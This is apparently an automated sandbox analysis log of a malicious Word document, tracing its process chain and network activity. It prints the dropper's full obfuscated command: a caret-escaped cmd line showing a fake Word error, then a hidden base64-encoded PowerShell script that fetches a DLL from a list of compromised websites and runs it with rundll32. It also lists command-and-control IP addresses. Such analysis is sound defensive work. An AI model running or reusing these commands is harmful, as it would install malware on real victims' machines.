                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: rundll32.exe, 00000008.00000002.2094600564.00000000007CD000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F1D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002912C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00411D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007112C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001812C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001F12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00661D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001B12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00411D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001D12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00171D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002B12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00281D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_001A12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 217.160.169.110 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.255.203.164 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.183.16.47 80
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAE